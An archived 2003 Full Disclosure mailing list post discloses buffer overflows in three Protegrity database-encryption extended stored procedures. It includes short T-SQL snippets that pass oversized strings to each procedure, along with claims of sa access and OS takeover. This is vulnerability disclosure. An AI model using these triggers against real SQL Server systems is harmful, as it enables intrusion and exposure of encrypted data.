Home page logo
/

fulldisclosure logo Full Disclosure mailing list archives

Protegrity buffer overflow
From: sss sss <protegritysecvuln () yahoo com>
Date: Thu, 13 Mar 2003 10:35:38 -0800 (PST)


Additional details can be found at http://www.kb.cert.org/vuls/id/247545

 

There is a company that does encryption of databases called Protegrty. They use extended stored procedures to do the 
encryption and decryption. I tested 3 of the extended stored procedures and found all 3 vulnerable to buffer overflows.

 

DECLARE @test varchar(8000)

SET @test = (SELECT replicate('x',1926))

execute master.dbo.xp_pty_checkusers 'as', @test

 

DECLARE @test varchar(8000)

SET @test = (SELECT replicate('x',850))

execute master.dbo.xp_pty_insert @test, @test, @test

 

DECLARE @test varchar(8000)

SET @test = (SELECT replicate('x',850))

execute master.dbo.xp_pty_select @test, @test, @test

 

These security holes are fully exploitable and would allow an attacker to perform any of the following:

1)       become sa on the box

2)       gain control of the operating system

3)       decrypt the sensitive data Protegrity is encrypting

 

If you have this software, contact the vendor for the patch.

 



---------------------------------
Do you Yahoo!?
Yahoo! Web Hosting - establish your business online

  By Date           By Thread  

Current thread:
  • Protegrity buffer overflow sss sss (Mar 13)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]
AlienVault